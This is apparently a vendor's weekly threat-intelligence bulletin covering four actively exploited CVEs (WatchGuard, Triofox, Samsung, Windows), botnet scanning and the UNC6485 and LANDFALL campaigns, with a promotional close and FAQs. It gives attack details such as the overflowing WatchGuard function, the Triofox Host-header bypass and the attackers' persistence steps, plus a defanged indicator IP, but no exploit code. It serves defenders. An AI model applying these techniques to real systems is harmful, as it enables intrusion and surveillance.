This week’s threat landscape was defined by a convergence of active vulnerability exploitation and evolving malware operations, with several high-impact flaws tied directly to ongoing campaigns.  

CISA added four vulnerabilities affecting WatchGuard Fireware OS, Microsoft Windows Kernel, Gladinet Triofox, and Samsung Mobile Devices to its Known Exploited Vulnerabilities (KEV) catalog, all of which have been weaponized in real-world attacks. These included the LANDFALL spyware targeting Samsung devices via malicious image files, and the UNC6485 threat actor exploiting the Triofox flaw for remote access and privilege escalation, while vulnerabilities in WatchGuard and Windows continued to draw exploitation attempts in the wild.

Complementing these developments, botnet operators such as EnemyBot, Sysrv-k, Andoryu, and Andorxgh0st expanded large-scale campaigns targeting exposed cloud services, routers, and web applications, reinforcing a clear pattern of threat actors capitalizing on newly exposed and already-patched weaknesses across multiple environments.  

Key points

• 4 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.  
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
• 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.  
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-9242 - Out-of-Bounds Write Vulnerability in WatchGuard Fireware OS

An Out-of-Bounds Write Vulnerability in WatchGuard Fireware OS allows remote, unauthenticated attacker to execute arbitrary code. Affected builds include 11.10.2 through 11.12.4_Update1, 12.0 through 12.11.3, and 2025.1, with 11.x releases at end-of-life and newer builds receiving updates. The root cause resides in ike2_ProcessPayload_CERT, where a client identification value is copied into a 520-byte stack buffer without proper length checking, enabling a pre-authentication stack overflow during the IKE_SA_AUTH phase. Public analysis shows the path is reachable pre-authentication and attractive to ransomware operators, with exploitation demonstrated to gain control of the instruction pointer, spawn an interactive Python shell over TCP, and escalate to a full Linux shell. Proof-of-concept code exists, evidence shows active exploitation, and the issue has since been added to the CISA KEV catalog.

CVE-2025-12480 - Improper Access Control Vulnerability in Gladinet Triofox

An Improper Access Control vulnerability in Gladinet Triofox, affecting versions prior to 16.7.10368.56560, allowed unauthenticated attackers to bypass authentication and access restricted configuration pages. The flaw, caused by improper validation of the HTTP Host header, enabled remote execution of arbitrary payloads and the creation of administrative accounts. According to Mandiant, the threat actor UNC6485 exploited this weakness to gain SYSTEM-level privileges, deploy remote access tools such as Zoho Assist and AnyDesk, and establish encrypted SSH tunnels for covert persistence. Gladinet addressed the issue in July 2025 with the release of version 16.7.10368.56560, and the vulnerability was later added to the CISA KEV catalog. Users are strongly advised to update to the latest version and verify system configurations to ensure complete remediation.

CVE-2025-21042 - Out-of-Bounds Write Vulnerability in Samsung Mobile Devices

An Out-of-Bounds Write Vulnerability in Samsung Mobile Devices, affecting versions prior to SMR Apr-2025 Release 1, allowed remote attackers to execute arbitrary code through the libimagecodec.quram.so component. The flaw was exploited as a zero-day in targeted attacks before being patched by Samsung in April 2025. According to Unit 42, the vulnerability was weaponized as part of a sophisticated spyware campaign delivering the LANDFALL framework via malicious DNG image files shared on WhatsApp, enabling data theft and device surveillance. This vulnerability has since been added to the CISA KEV catalog.

CVE-2025-62215 - Race Condition Vulnerability in Microsoft Windows

An Elevation of Privilege (EoP) vulnerability in the Microsoft Windows Kernel allowed authenticated attackers to gain SYSTEM-level privileges by exploiting a race condition arising from improper synchronization during concurrent execution with shared resources. This flaw could be leveraged locally to elevate privileges by successfully winning the race condition. According to Trend Micro, such vulnerabilities are often chained with code execution flaws by malware operators to achieve complete system compromise. Microsoft addressed the issue in its November 2025 Patch Tuesday update, strengthening synchronization controls within the Windows Kernel, and the vulnerability was subsequently added to the CISA KEV catalog to highlight its active exploitation risk.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

CVE-2025-12480

According to Mandiant, this vulnerability was actively exploited in the wild by a threat actor tracked as UNC6485, a cluster known for targeting enterprise servers to gain remote access and steal credentials. The group exploited an unauthenticated access flaw in Triofox to create administrative accounts, escalate privileges to SYSTEM, and deploy remote-access tools like Zoho Assist and AnyDesk. The attackers configured the antivirus engine path to execute a malicious batch file, centre_report.bat, which downloaded a Zoho UEMS installer from 84.200.80[.]252 and leveraged it to install these remote-access tools for persistence. To evade detection, UNC6485 also used Plink and PuTTY to establish encrypted SSH tunnels over port 433, enabling covert RDP access and maintaining long-term control within compromised environments.  

CVE-2025-21042

According to Unit 42, the vulnerability was exploited in the wild before Samsung’s April 2025 patch as part of a sophisticated spyware campaign involving a framework named LANDFALL. The campaign distributed malicious DNG (Digital Negative) image files via WhatsApp to exploit the flaw and deploy the spyware on targeted devices. Once installed, LANDFALL operated as a modular surveillance tool capable of recording calls and ambient audio, stealing contacts, SMS, files, and photos, tracking device location, and detecting analysis tools such as Frida and Xposed. It also manipulated WhatsApp’s media directory to maintain persistence and primarily targeted Samsung Galaxy S22, S23, and S24 series, along with Z Fold4 and Z Flip4 devices, excluding the latest-generation models.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

The week’s findings reaffirm that threat actors are rapidly exploiting both newly disclosed and previously patched vulnerabilities to gain persistence across enterprise and mobile environments. Continuous monitoring and proactive vulnerability intelligence are critical to countering these evolving threats. Loginsoft Vulnerability Intelligence (LOVI) enables organizations to detect, track, and respond to such exploitation trends in real time, strengthening resilience against active campaigns and emerging threats.

FAQs:

1) What is Gladinet Triofox and why is it targeted by threat actors?

Gladinet Triofox is an enterprise file-sharing and remote access platform that enables secure cloud connectivity for business data. It is often targeted because it provides direct access to corporate storage and administrative controls, making it valuable for attackers seeking privilege escalation.

2) What is a PRE-NVD vulnerability, why is it considered effective for early detection?  

A PRE-NVD vulnerability refers to a security flaw identified before it’s officially analyzed and published in the National Vulnerability Database (NVD). It is effective for defenders because it provides early visibility, allowing faster patching and mitigation before widespread disclosure.

3) What does “PoC available” mean, and why does it increase risk for a vulnerability?

A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.  

4) What does inclusion in the CISA KEV catalog indicate about a vulnerability’s risk level?  

A) When a vulnerability is added to the CISA KEV catalog, it signifies that it is being actively exploited in real-world attacks and poses a serious, immediate risk. CISA includes only confirmed exploited vulnerabilities in this list to ensure organizations focus on patching the most dangerous threats first. Being listed means the flaw demands urgent remediation to prevent compromise across government and enterprise environments.